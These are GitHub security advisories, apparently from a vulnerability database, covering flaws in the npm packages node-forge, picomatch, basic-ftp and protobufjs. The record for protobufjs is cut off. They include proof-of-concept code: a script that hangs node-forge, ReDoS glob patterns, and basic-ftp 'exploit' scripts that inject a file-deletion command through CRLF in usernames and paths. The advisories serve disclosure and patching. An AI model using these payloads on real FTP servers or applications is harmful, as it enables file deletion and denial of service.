A Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Affected Package
Package name: node-forge (npm: node-forge) Repository: https://github.com/digitalbazaar/forge Affected versions: All versions (including latest) Affected file: lib/jsbn.js, function bnModInverse() Root cause component: Bundled copy of the jsbn (JavaScript Big Number) library
Vulnerability Details
Type: Denial of Service (DoS) CWE: CWE-835 (Loop with Unreachable Exit Condition) Attack vector: Network (if the application processes untrusted input that reaches modInverse) Privileges required: None User interaction: None Impact: Availability (process hangs indefinitely) Suggested CVSS v3.1 score: 5.3–7.5 (depending on the context of usage)
Root Cause Analysis
The BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m. Mathematically, the modular inverse of 0 does not exist — gcd(0, m) = m ≠ 1 for any m > 1. However, the implementation does not check whether the input value is zero before entering the algorithm's main loop. When this equals 0, the algorithm's loop condition is never satisfied for termination, resulting in an infinite loop. The relevant code path in lib/jsbn.js:
javascriptfunction bnModInverse(m) {
// ... setup ...
// No check for this == 0
// Enters Extended Euclidean Algorithm loop that never terminates when this == 0
}
Attack Scenario
Any application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:
DSA/ECDSA signature verification — A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang. Custom RSA or Diffie-Hellman implementations — Applications performing modular arithmetic with user-supplied parameters. Any cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().
A single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.
Proof of Concept
Environment Setup
mkdir forge-poc && cd forge-poc
npm init -y
npm install node-forge
Reproduction (poc.js) A single script that safely detects the vulnerability using a child process with timeout. The parent process is never at risk of hanging.
mkdir forge-poc && cd forge-poc
npm init -y
npm install node-forge
# Save the script below as poc.js, then run:
node poc.js
'use strict';
const { spawnSync } = require('child_process');
const childCode = `
const forge = require('node-forge');
// jsbn may not be auto-loaded; try explicit require if needed
if (!forge.jsbn) {
try { require('node-forge/lib/jsbn'); } catch(e) {}
}
if (!forge.jsbn || !forge.jsbn.BigInteger) {
console.error('ERROR: forge.jsbn.BigInteger not available');
process.exit(2);
}
const BigInteger = forge.jsbn.BigInteger;
const zero = new BigInteger('0', 10);
const mod = new BigInteger('3', 10);
// This call should throw or return 0, but instead loops forever
const inv = zero.modInverse(mod);
console.log('returned: ' + inv.toString());
`;
console.log('[*] Testing: BigInteger(0).modInverse(3)');
console.log('[*] Expected: throw an error or return quickly');
console.log('[*] Spawning child process with 5s timeout...');
console.log();
const result = spawnSync(process.execPath, ['-e', childCode], {
encoding: 'utf8',
timeout: 5000,
});
if (result.error && result.error.code === 'ETIMEDOUT') {
console.log('[VULNERABLE] Child process timed out after 5s');
console.log(' -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');
process.exit(0);
}
if (result.status === 2) {
console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());
console.log(' -> Check your node-forge installation');
process.exit(1);
}
if (result.status === 0) {
console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());
process.exit(1);
}
console.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');
if (result.stderr) console.log(' stderr:', result.stderr.trim());
process.exit(1);
Expected Output
[*] Testing: BigInteger(0).modInverse(3)
[*] Expected: throw an error or return quickly
[*] Spawning child process with 5s timeout...
[VULNERABLE] Child process timed out after 5s
-> modInverse(0, 3) entered an infinite loop (DoS confirmed)
Verified On
node-forge v1.3.1 (latest at time of writing) Node.js v18.x / v20.x / v22.x macOS / Linux / Windows
Impact
Availability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests. Scope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.
Suggested Fix
Add a zero-value check at the entry of bnModInverse() in lib/jsbn.js:
function bnModInverse(m) {
var ac = m.isEven();
// Add this check:
if (this.signum() == 0) {
throw new Error('BigInteger has no modular inverse: input is zero');
}
// ... rest of the existing implementation ...
}
Alternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java's BigInteger.modInverse() throws ArithmeticException).
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-forge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33891"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T21:57:48Z",
"nvd_published_at": "2026-03-27T21:17:25Z",
"severity": "HIGH"
},
"details": "## Summary\n\nA Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU.\nAffected Package\n\nPackage name: node-forge (npm: node-forge)\nRepository: https://github.com/digitalbazaar/forge\nAffected versions: All versions (including latest)\nAffected file: lib/jsbn.js, function bnModInverse()\nRoot cause component: Bundled copy of the jsbn (JavaScript Big Number) library\n\n## Vulnerability Details\n\nType: Denial of Service (DoS)\nCWE: CWE-835 (Loop with Unreachable Exit Condition)\nAttack vector: Network (if the application processes untrusted input that reaches modInverse)\nPrivileges required: None\nUser interaction: None\nImpact: Availability (process hangs indefinitely)\nSuggested CVSS v3.1 score: 5.3\u20137.5 (depending on the context of usage)\n\n## Root Cause Analysis\n\nThe BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m.\nMathematically, the modular inverse of 0 does not exist \u2014 gcd(0, m) = m \u2260 1 for any m \u003e 1. However, the implementation does not check whether the input value is zero before entering the algorithm\u0027s main loop. When this equals 0, the algorithm\u0027s loop condition is never satisfied for termination, resulting in an infinite loop.\nThe relevant code path in lib/jsbn.js:\n```js\njavascriptfunction bnModInverse(m) {\n // ... setup ...\n // No check for this == 0\n // Enters Extended Euclidean Algorithm loop that never terminates when this == 0\n}\n```\n\n## Attack Scenario\n\nAny application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:\n\nDSA/ECDSA signature verification \u2014 A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang.\nCustom RSA or Diffie-Hellman implementations \u2014 Applications performing modular arithmetic with user-supplied parameters.\nAny cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().\n\nA single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.\n\n## Proof of Concept\n\nEnvironment Setup\n```bash\nmkdir forge-poc \u0026\u0026 cd forge-poc\nnpm init -y\nnpm install node-forge\n```\nReproduction (poc.js)\nA single script that safely detects the vulnerability using a child process with timeout. The parent process is never at risk of hanging.\n```bash\nmkdir forge-poc \u0026\u0026 cd forge-poc\nnpm init -y\nnpm install node-forge\n# Save the script below as poc.js, then run:\nnode poc.js\n```\n```javascript\n\u0027use strict\u0027;\nconst { spawnSync } = require(\u0027child_process\u0027);\n\nconst childCode = `\n const forge = require(\u0027node-forge\u0027);\n // jsbn may not be auto-loaded; try explicit require if needed\n if (!forge.jsbn) {\n try { require(\u0027node-forge/lib/jsbn\u0027); } catch(e) {}\n }\n if (!forge.jsbn || !forge.jsbn.BigInteger) {\n console.error(\u0027ERROR: forge.jsbn.BigInteger not available\u0027);\n process.exit(2);\n }\n const BigInteger = forge.jsbn.BigInteger;\n const zero = new BigInteger(\u00270\u0027, 10);\n const mod = new BigInteger(\u00273\u0027, 10);\n // This call should throw or return 0, but instead loops forever\n const inv = zero.modInverse(mod);\n console.log(\u0027returned: \u0027 + inv.toString());\n`;\n\nconsole.log(\u0027[*] Testing: BigInteger(0).modInverse(3)\u0027);\nconsole.log(\u0027[*] Expected: throw an error or return quickly\u0027);\nconsole.log(\u0027[*] Spawning child process with 5s timeout...\u0027);\nconsole.log();\n\nconst result = spawnSync(process.execPath, [\u0027-e\u0027, childCode], {\n encoding: \u0027utf8\u0027,\n timeout: 5000,\n});\n\nif (result.error \u0026\u0026 result.error.code === \u0027ETIMEDOUT\u0027) {\n console.log(\u0027[VULNERABLE] Child process timed out after 5s\u0027);\n console.log(\u0027 -\u003e modInverse(0, 3) entered an infinite loop (DoS confirmed)\u0027);\n process.exit(0);\n}\n\nif (result.status === 2) {\n console.log(\u0027[ERROR] Could not access BigInteger:\u0027, result.stderr.trim());\n console.log(\u0027 -\u003e Check your node-forge installation\u0027);\n process.exit(1);\n}\n\nif (result.status === 0) {\n console.log(\u0027[NOT VULNERABLE] modInverse returned:\u0027, result.stdout.trim());\n process.exit(1);\n}\n\nconsole.log(\u0027[NOT VULNERABLE] Child exited with error (status \u0027 + result.status + \u0027)\u0027);\nif (result.stderr) console.log(\u0027 stderr:\u0027, result.stderr.trim());\nprocess.exit(1);\n```\nExpected Output\n```\n[*] Testing: BigInteger(0).modInverse(3)\n[*] Expected: throw an error or return quickly\n[*] Spawning child process with 5s timeout...\n\n[VULNERABLE] Child process timed out after 5s\n -\u003e modInverse(0, 3) entered an infinite loop (DoS confirmed)\nVerified On\n```\n\nnode-forge v1.3.1 (latest at time of writing)\nNode.js v18.x / v20.x / v22.x\nmacOS / Linux / Windows\n\n## Impact\n\nAvailability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests.\nScope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.\n\n## Suggested Fix\n\nAdd a zero-value check at the entry of bnModInverse() in lib/jsbn.js:\n```javascript\nfunction bnModInverse(m) {\n var ac = m.isEven();\n // Add this check:\n if (this.signum() == 0) {\n throw new Error(\u0027BigInteger has no modular inverse: input is zero\u0027);\n }\n // ... rest of the existing implementation ...\n}\n```\nAlternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java\u0027s BigInteger.modInverse() throws ArithmeticException).",
"id": "GHSA-5m6q-g25r-mvwx",
"modified": "2026-03-27T21:50:24Z",
"published": "2026-03-26T21:57:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891"
},
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023"
},
{
"type": "PACKAGE",
"url": "https://github.com/digitalbazaar/forge"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input"
}
GHSA-C2C7-RCM5-VVQJ
Vulnerability from github – Published: 2026-03-25 21:12 – Updated: 2026-03-27 21:36Impact
picomatch is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as +() and *(), especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.
Examples of problematic patterns include +(a|aa), +(*|?), +(+(a)), *(+(a)), and +(+(+(a))). In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, +(a|aa) compiled to ^(?:(?=.)(?:a|aa)+)$ and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as +(+(a)) and *(+(a)) took around 29 seconds to reject a 33-character input on a modern M1 MacBook.
Applications are impacted when they allow untrusted users to supply glob patterns that are passed to picomatch for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.
Patches
This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.
Users should upgrade to one of these versions or later, depending on their supported release line.
Workarounds
If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.
Possible mitigations include:
- disable extglob support for untrusted patterns by using noextglob: true
- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as +() and *()
- enforce strict allowlists for accepted pattern syntax
- run matching in an isolated worker or separate process with time and resource limits
- apply application-level request throttling and input validation for any endpoint that accepts glob patterns
Resources
- Picomatch repository: https://github.com/micromatch/picomatch
lib/parse.jsandlib/constants.jsare involved in generating the vulnerable regex forms- Comparable ReDoS precedent: CVE-2024-4067 (
micromatch) - Comparable generated-regex precedent: CVE-2024-45296 (
path-to-regexp)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "picomatch"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.0.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "picomatch"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "picomatch"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33671"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-25T21:12:07Z",
"nvd_published_at": "2026-03-26T22:16:30Z",
"severity": "HIGH"
},
"details": "### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)",
"id": "GHSA-c2c7-rcm5-vvqj",
"modified": "2026-03-27T21:36:13Z",
"published": "2026-03-25T21:12:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33671"
},
{
"type": "WEB",
"url": "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d"
},
{
"type": "PACKAGE",
"url": "https://github.com/micromatch/picomatch"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Picomatch has a ReDoS vulnerability via extglob quantifiers"
}
GHSA-6V7Q-WJVX-W8WG
Vulnerability from github – Published: 2026-04-10 20:18 – Updated: 2026-04-10 20:18Summary
basic-ftp's CRLF injection protection (added in commit 2ecc8e2 for GHSA-chqc-8p9q-pq6q) is incomplete. Two code paths bypass the protectWhitespace() control character check: (1) the login() method directly concatenates user-supplied credentials into USER/PASS FTP commands without any validation, and (2) the _openDir() method sends an MKD command before cd() invokes protectWhitespace(), creating a TOCTOU bypass. Both vectors allow an attacker who controls input to inject arbitrary FTP commands into the control connection.
Details
Vector 1: Credential Injection (login)
The login() method constructs FTP commands by direct string concatenation with no CRLF validation:
// src/Client.ts:216-231
login(user = "anonymous", password = "guest"): Promise<FTPResponse> {
this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`)
return this.ftp.handle("USER " + user, (res, task) => { // Line 218: no validation on `user`
// ...
else if (res.code === 331) {
this.ftp.send("PASS " + password) // Line 226: no validation on `password`
}
})
}
FtpContext.send() writes directly to the TCP socket:
// src/FtpContext.ts:223-227
send(command: string) {
// ...
this._socket.write(command + "\r\n", this.encoding)
}
The protectWhitespace() method (line 762) rejects \r, \n, and \0 characters — but it is only called for path-based operations. Credentials never pass through it.
The public access() method (line 268) passes options.user and options.password directly to login() with no sanitization.
Vector 2: MKD TOCTOU Bypass (_openDir)
The _openDir() method sends an MKD command before the CRLF check in cd():
// src/Client.ts:745-748
protected async _openDir(dirName: string) {
await this.sendIgnoringError("MKD " + dirName) // Line 746: sent BEFORE validation
await this.cd(dirName) // Line 747: protectWhitespace() called here — too late
}
This is called from ensureDir() (line 729) which splits a user-supplied remote path by / and passes each fragment to _openDir(), and from _uploadToWorkingDir() (line 679) which passes local directory names read from the filesystem.
PoC
Vector 1: Credential Injection
const ftp = require("basic-ftp");
async function exploit() {
const client = new ftp.Client();
client.ftp.verbose = true;
// Connect to target FTP server
await client.access({
host: "target-ftp-server",
port: 21,
// Username contains CRLF + injected DELE command
user: "anonymous\r\nDELE important.txt",
password: "guest"
});
// Server receives on the wire:
// USER anonymous\r\n
// DELE important.txt\r\n
// PASS guest\r\n
// The DELE command executes before PASS is processed
client.close();
}
exploit();
Vector 2: MKD TOCTOU Bypass
const ftp = require("basic-ftp");
async function exploit() {
const client = new ftp.Client();
client.ftp.verbose = true;
await client.access({
host: "target-ftp-server",
user: "anonymous",
password: "guest"
});
// Path fragment with CRLF — MKD is sent before cd() validates
try {
await client.ensureDir("test\r\nDELE important.txt/subdir");
} catch (e) {
// cd() throws after protectWhitespace() rejects, but MKD + DELE already sent
}
// Server received:
// MKD test\r\n
// DELE important.txt\r\n
// CWD test\r\n <-- this may fail, but damage is done
client.close();
}
exploit();
Impact
An attacker who controls credentials or remote paths passed to basic-ftp can inject arbitrary FTP commands into the control connection. This enables:
- File deletion: Inject
DELEcommands to remove files on the FTP server - File manipulation: Inject
RNFR/RNTOto rename files,MKD/RMDto create/remove directories - Server commands: Inject
SITEcommands (e.g.,SITE CHMOD) to change permissions - Session hijacking: Inject
USER/PASSto re-authenticate as a different user
The credential injection vector (Vector 1) is particularly dangerous because it occurs before authentication, meaning the injected commands execute with whatever default permissions the server grants during the login handshake.
Applications that accept user-supplied FTP credentials (e.g., web-based file managers, backup tools, deployment systems) are directly vulnerable.
Recommended Fix
Add CRLF validation to both code paths:
1. Validate credentials in login():
// src/Client.ts:216
login(user = "anonymous", password = "guest"): Promise<FTPResponse> {
if (/[\r\n\0]/.test(user) || /[\r\n\0]/.test(password)) {
return Promise.reject(new Error("Invalid credentials: Contains control characters"));
}
this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`)
return this.ftp.handle("USER " + user, (res, task) => {
// ... rest unchanged
})
}
2. Validate dirName in _openDir() before sending MKD:
// src/Client.ts:745
protected async _openDir(dirName: string) {
if (/[\r\n\0]/.test(dirName)) {
throw new Error("Invalid path: Contains control characters");
}
await this.sendIgnoringError("MKD " + dirName)
await this.cd(dirName)
}
Alternatively, centralize CRLF validation in FtpContext.send() so that all FTP commands are protected regardless of the calling code path.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.2.1"
},
"package": {
"ecosystem": "npm",
"name": "basic-ftp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T20:18:23Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nbasic-ftp\u0027s CRLF injection protection (added in commit 2ecc8e2 for GHSA-chqc-8p9q-pq6q) is incomplete. Two code paths bypass the `protectWhitespace()` control character check: (1) the `login()` method directly concatenates user-supplied credentials into USER/PASS FTP commands without any validation, and (2) the `_openDir()` method sends an MKD command before `cd()` invokes `protectWhitespace()`, creating a TOCTOU bypass. Both vectors allow an attacker who controls input to inject arbitrary FTP commands into the control connection.\n\n## Details\n\n### Vector 1: Credential Injection (login)\n\nThe `login()` method constructs FTP commands by direct string concatenation with no CRLF validation:\n\n```typescript\n// src/Client.ts:216-231\nlogin(user = \"anonymous\", password = \"guest\"): Promise\u003cFTPResponse\u003e {\n this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`)\n return this.ftp.handle(\"USER \" + user, (res, task) =\u003e { // Line 218: no validation on `user`\n // ...\n else if (res.code === 331) {\n this.ftp.send(\"PASS \" + password) // Line 226: no validation on `password`\n }\n })\n}\n```\n\n`FtpContext.send()` writes directly to the TCP socket:\n\n```typescript\n// src/FtpContext.ts:223-227\nsend(command: string) {\n // ...\n this._socket.write(command + \"\\r\\n\", this.encoding)\n}\n```\n\nThe `protectWhitespace()` method (line 762) rejects `\\r`, `\\n`, and `\\0` characters \u2014 but it is only called for path-based operations. Credentials never pass through it.\n\nThe public `access()` method (line 268) passes `options.user` and `options.password` directly to `login()` with no sanitization.\n\n### Vector 2: MKD TOCTOU Bypass (_openDir)\n\nThe `_openDir()` method sends an MKD command before the CRLF check in `cd()`:\n\n```typescript\n// src/Client.ts:745-748\nprotected async _openDir(dirName: string) {\n await this.sendIgnoringError(\"MKD \" + dirName) // Line 746: sent BEFORE validation\n await this.cd(dirName) // Line 747: protectWhitespace() called here \u2014 too late\n}\n```\n\nThis is called from `ensureDir()` (line 729) which splits a user-supplied remote path by `/` and passes each fragment to `_openDir()`, and from `_uploadToWorkingDir()` (line 679) which passes local directory names read from the filesystem.\n\n## PoC\n\n### Vector 1: Credential Injection\n\n```javascript\nconst ftp = require(\"basic-ftp\");\n\nasync function exploit() {\n const client = new ftp.Client();\n client.ftp.verbose = true;\n\n // Connect to target FTP server\n await client.access({\n host: \"target-ftp-server\",\n port: 21,\n // Username contains CRLF + injected DELE command\n user: \"anonymous\\r\\nDELE important.txt\",\n password: \"guest\"\n });\n // Server receives on the wire:\n // USER anonymous\\r\\n\n // DELE important.txt\\r\\n\n // PASS guest\\r\\n\n // The DELE command executes before PASS is processed\n\n client.close();\n}\n\nexploit();\n```\n\n### Vector 2: MKD TOCTOU Bypass\n\n```javascript\nconst ftp = require(\"basic-ftp\");\n\nasync function exploit() {\n const client = new ftp.Client();\n client.ftp.verbose = true;\n\n await client.access({\n host: \"target-ftp-server\",\n user: \"anonymous\",\n password: \"guest\"\n });\n\n // Path fragment with CRLF \u2014 MKD is sent before cd() validates\n try {\n await client.ensureDir(\"test\\r\\nDELE important.txt/subdir\");\n } catch (e) {\n // cd() throws after protectWhitespace() rejects, but MKD + DELE already sent\n }\n // Server received:\n // MKD test\\r\\n\n // DELE important.txt\\r\\n\n // CWD test\\r\\n \u003c-- this may fail, but damage is done\n\n client.close();\n}\n\nexploit();\n```\n\n## Impact\n\nAn attacker who controls credentials or remote paths passed to basic-ftp can inject arbitrary FTP commands into the control connection. This enables:\n\n- **File deletion**: Inject `DELE` commands to remove files on the FTP server\n- **File manipulation**: Inject `RNFR`/`RNTO` to rename files, `MKD`/`RMD` to create/remove directories\n- **Server commands**: Inject `SITE` commands (e.g., `SITE CHMOD`) to change permissions\n- **Session hijacking**: Inject `USER`/`PASS` to re-authenticate as a different user\n\nThe credential injection vector (Vector 1) is particularly dangerous because it occurs before authentication, meaning the injected commands execute with whatever default permissions the server grants during the login handshake.\n\nApplications that accept user-supplied FTP credentials (e.g., web-based file managers, backup tools, deployment systems) are directly vulnerable.\n\n## Recommended Fix\n\nAdd CRLF validation to both code paths:\n\n**1. Validate credentials in `login()`:**\n\n```typescript\n// src/Client.ts:216\nlogin(user = \"anonymous\", password = \"guest\"): Promise\u003cFTPResponse\u003e {\n if (/[\\r\\n\\0]/.test(user) || /[\\r\\n\\0]/.test(password)) {\n return Promise.reject(new Error(\"Invalid credentials: Contains control characters\"));\n }\n this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`)\n return this.ftp.handle(\"USER \" + user, (res, task) =\u003e {\n // ... rest unchanged\n })\n}\n```\n\n**2. Validate dirName in `_openDir()` before sending MKD:**\n\n```typescript\n// src/Client.ts:745\nprotected async _openDir(dirName: string) {\n if (/[\\r\\n\\0]/.test(dirName)) {\n throw new Error(\"Invalid path: Contains control characters\");\n }\n await this.sendIgnoringError(\"MKD \" + dirName)\n await this.cd(dirName)\n}\n```\n\nAlternatively, centralize CRLF validation in `FtpContext.send()` so that all FTP commands are protected regardless of the calling code path.",
"id": "GHSA-6v7q-wjvx-w8wg",
"modified": "2026-04-10T20:18:23Z",
"published": "2026-04-10T20:18:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-6v7q-wjvx-w8wg"
},
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/commit/20327d35126e57e5fdbaae79a4b65222fbadc53c"
},
{
"type": "PACKAGE",
"url": "https://github.com/patrickjuchli/basic-ftp"
},
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "basic-ftp: Incomplete CRLF Injection Protection Allows Arbitrary FTP Command Execution via Credentials and MKD Commands"
}
GHSA-JVWF-75H9-CWGG
Vulnerability from github – Published: 2026-05-12 15:01 – Updated: 2026-05-14 20:35Summary
protobufjs allowed certain schema option paths to traverse through inherited object properties while applying options. A crafted protobuf schema or JSON descriptor could cause option handling to write to properties on global JavaScript constructors, corrupting process-wide built-in functionality.
Impact
An attacker who can provide or influence protobuf schemas or JSON descriptors may be able to corrupt built-in process state in a way that causes subsequent application code or protobufjs code to fail. This can result in a persistent denial of service for the lifetime of the affected process.
This issue affects applications that parse or load protobuf schemas or descriptors from untrusted sources. Applications that use bundled, generated, or otherwise trusted schemas to decode untrusted protobuf message payloads are not directly affected.
The issue is not known to allow code execution by itself.
Preconditions
- The application must allow an attacker to control or influence a protobuf schema or JSON descriptor.
- The application must parse or load that schema through protobufjs reflection APIs such as
parse,Root.load,Root.loadSync, orRoot.fromJSON. - The crafted input must contain option paths that reach unsafe inherited properties during option processing.
Workarounds
Do not parse or load protobuf schemas or JSON descriptors from untrusted sources with affected versions. If untrusted schemas must be accepted, validate or reject option names containing unsafe property path components before loading them, and run schema processing in an isolated process.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.5.5"
},
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.5.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.0.1"
},
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44290"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-12T15:01:13Z",
"nvd_published_at": "2026-05-13T16:16:55Z",
"severity": "HIGH"
},
"details": "## Summary\n\nprotobufjs allowed certain schema option paths to traverse through inherited object properties while applying options. A crafted protobuf schema or JSON descriptor could cause option handling to write to properties on global JavaScript constructors, corrupting process-wide built-in functionality.\n\n## Impact\n\nAn attacker who can provide or influence protobuf schemas or JSON descriptors may be able to corrupt built-in process state in a way that causes subsequent application code or protobufjs code to fail. This can result in a persistent denial of service for the lifetime of the affected process.\n\nThis issue affects applications that parse or load protobuf schemas or descriptors from untrusted sources. Applications that use bundled, generated, or otherwise trusted schemas to decode untrusted protobuf message payloads are not directly affected.\n\nThe issue is not known to allow code execution by itself.\n\n## Preconditions\n\n- The application must allow an attacker to control or influence a protobuf schema or JSON descriptor.\n- The application must parse or load that schema through protobufjs reflection APIs such as `parse`, `Root.load`, `Root.loadSync`, or `Root.fromJSON`.\n- The crafted input must contain option paths that reach unsafe inherited properties during option processing.\n\n## Workarounds\n\nDo not parse or load protobuf schemas or JSON descriptors from untrusted sources with affected versions. If untrusted schemas must be accepted, validate or reject option names containing unsafe property path components before loading them, and run schema processing in an isolated process.",
